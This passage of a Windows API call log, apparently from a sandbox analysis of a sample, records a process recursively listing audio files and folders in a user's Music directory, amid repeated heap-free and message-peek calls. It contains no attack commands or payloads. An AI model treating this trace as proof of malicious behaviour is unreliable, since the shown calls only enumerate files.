lpMem=0x8e20b0 | out: hHeap=0x8a0000) returned 1 [0157.874] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\*", lpFindFileData=0x87e180 | out: lpFindFileData=0x87e180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00a2c0, ftCreationTime.dwHighDateTime=0x1d5daea, ftLastAccessTime.dwLowDateTime=0x10c5a950, ftLastAccessTime.dwHighDateTime=0x1d5dfe2, ftLastWriteTime.dwLowDateTime=0x10c5a950, ftLastWriteTime.dwHighDateTime=0x1d5dfe2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90b098 [0157.877] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e180 | out: lpFindFileData=0x87e180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00a2c0, ftCreationTime.dwHighDateTime=0x1d5daea, ftLastAccessTime.dwLowDateTime=0x10c5a950, ftLastAccessTime.dwHighDateTime=0x1d5dfe2, ftLastWriteTime.dwLowDateTime=0x10c5a950, ftLastWriteTime.dwHighDateTime=0x1d5dfe2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.877] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e180 | out: lpFindFileData=0x87e180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xece70390, ftCreationTime.dwHighDateTime=0x1d5dda6, ftLastAccessTime.dwLowDateTime=0xe92c4280, ftLastAccessTime.dwHighDateTime=0x1d5ddc7, ftLastWriteTime.dwLowDateTime=0xe92c4280, ftLastWriteTime.dwHighDateTime=0x1d5ddc7, nFileSizeHigh=0x0, nFileSizeLow=0xc44, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="9zmv2.m4a", cAlternateFileName="")) returned 1 [0157.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9baca8 | out: hHeap=0x8a0000) returned 1 [0157.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x909290 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20d0 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac90 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac78 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df618 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.878] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20e0 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20d0 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.878] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.878] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20d0 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac78 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df618 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac90 | out: hHeap=0x8a0000) returned 1 [0157.878] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20e0 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.878] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20e0 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.879] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac78 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2100 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bacc0 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2110 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac78 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20e0 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x909290 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20f0 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac90 | out: hHeap=0x8a0000) returned 1 [0157.879] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b118 | out: hHeap=0x8a0000) returned 1 [0157.879] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20f0 | out: hHeap=0x8a0000) returned 1 [0157.879] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.879] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96d1f10, ftCreationTime.dwHighDateTime=0x1d5ddcd, ftLastAccessTime.dwLowDateTime=0xc516f910, ftLastAccessTime.dwHighDateTime=0x1d5e463, ftLastWriteTime.dwLowDateTime=0xc516f910, ftLastWriteTime.dwHighDateTime=0x1d5e463, nFileSizeHigh=0x0, nFileSizeLow=0xcb34, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="AXe49W4a SJDN r.mp3", cAlternateFileName="AXE49W~1.MP3")) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac90 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df618 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20f0 | out: hHeap=0x8a0000) returned 1 [0157.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df668 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee400 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac78 | out: hHeap=0x8a0000) returned 1 [0157.880] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20f0 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.880] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20f0 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.880] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac90 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2110 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e53b0 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bacc0 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2100 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac90 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20f0 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x909290 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20e0 | out: hHeap=0x8a0000) returned 1 [0157.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac78 | out: hHeap=0x8a0000) returned 1 [0157.880] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b118 | out: hHeap=0x8a0000) returned 1 [0157.881] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20e0 | out: hHeap=0x8a0000) returned 1 [0157.881] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.881] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5e18470, ftCreationTime.dwHighDateTime=0x1d5e62a, ftLastAccessTime.dwLowDateTime=0x2e730940, ftLastAccessTime.dwHighDateTime=0x1d5e62f, ftLastWriteTime.dwLowDateTime=0x2e730940, ftLastWriteTime.dwHighDateTime=0x1d5e62f, nFileSizeHigh=0x0, nFileSizeLow=0x675e, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="cxrsN5DPtYDsIm.wav", cAlternateFileName="CXRSN5~1.WAV")) returned 1 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac78 | out: hHeap=0x8a0000) returned 1 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df668 | out: hHeap=0x8a0000) returned 1 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20e0 | out: hHeap=0x8a0000) returned 1 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee400 | out: hHeap=0x8a0000) returned 1 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac90 | out: hHeap=0x8a0000) returned 1 [0157.881] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20e0 | out: hHeap=0x8a0000) returned 1 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.881] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20e0 | out: hHeap=0x8a0000) returned 1 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.881] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac78 | out: hHeap=0x8a0000) returned 1 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2100 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e53b0 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bacc0 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2110 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac78 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20e0 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x909290 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20f0 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac90 | out: hHeap=0x8a0000) returned 1 [0157.882] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b118 | out: hHeap=0x8a0000) returned 1 [0157.882] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20f0 | out: hHeap=0x8a0000) returned 1 [0157.882] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.882] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6ad4f0, ftCreationTime.dwHighDateTime=0x1d5daa3, ftLastAccessTime.dwLowDateTime=0xa12b5b80, ftLastAccessTime.dwHighDateTime=0x1d5e5cc, ftLastWriteTime.dwLowDateTime=0xa12b5b80, ftLastWriteTime.dwHighDateTime=0x1d5e5cc, nFileSizeHigh=0x0, nFileSizeLow=0x18a5d, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="R64I-TKxh1f.wav", cAlternateFileName="R64I-T~1.WAV")) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac90 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df668 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20f0 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df618 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac78 | out: hHeap=0x8a0000) returned 1 [0157.882] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20f0 | out: hHeap=0x8a0000) returned 1 [0157.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.883] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20f0 | out: hHeap=0x8a0000) returned 1 [0157.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e20a0 | out: hHeap=0x8a0000) returned 1 [0157.883] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bac90 | out: hHeap=0x8a0000) returned 1 [0157.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.883] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.883] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.883] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.883] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e168 | out: lpFindFileData=0x87e168*(dwFileAttributes=0x1720046, ftCreationTime.dwLowDateTime=0x48b2, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x1680047, nFileSizeHigh=0x48b2, nFileSizeLow=0x9bac18, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="R6\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.883] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.883] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.883] FindClose (in: hFindFile=0x90b098 | out: hFindFile=0x90b098) returned 1 [0157.884] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.884] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.884] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.885] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.885] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54392d80, ftCreationTime.dwHighDateTime=0x1d5e616, ftLastAccessTime.dwLowDateTime=0x139b4770, ftLastAccessTime.dwHighDateTime=0x1d5dff6, ftLastWriteTime.dwLowDateTime=0x139b4770, ftLastWriteTime.dwHighDateTime=0x1d5dff6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="aJ1lagIQtz", cAlternateFileName="AJ1LAG~1")) returned 1 [0157.885] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.885] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.885] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.885] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.885] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.885] PeekMessageW (in: lpMsg=0x87e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e734) returned 0 [0157.885] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\*", lpFindFileData=0x87e180 | out: lpFindFileData=0x87e180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54392d80, ftCreationTime.dwHighDateTime=0x1d5e616, ftLastAccessTime.dwLowDateTime=0x139b4770, ftLastAccessTime.dwHighDateTime=0x1d5dff6, ftLastWriteTime.dwLowDateTime=0x139b4770, ftLastWriteTime.dwHighDateTime=0x1d5dff6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9b6050, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90b098 [0157.888] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e180 | out: lpFindFileData=0x87e180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54392d80, ftCreationTime.dwHighDateTime=0x1d5e616, ftLastAccessTime.dwLowDateTime=0x139b4770, ftLastAccessTime.dwHighDateTime=0x1d5dff6, ftLastWriteTime.dwLowDateTime=0x139b4770, ftLastWriteTime.dwHighDateTime=0x1d5dff6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9b6050, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.888] FindNextFileW (in: hFindFile=0x90b098, lpFindFileData=0x87e180 | out: lpFindFileData=0x87e180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6621ee0, ftCreationTime.dwHighDateTime=0x1d5e716, ftLastAccessTime.dwLowDateTime=0x47c27ea0, ftLastAccessTime.dwHighDateTime=0x1d5e6dc, ftLastWriteTime.dwLowDateTime=0x47c27ea0, ftLastWriteTime.dwHighDateTime=0x1d5e6dc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9b6050, 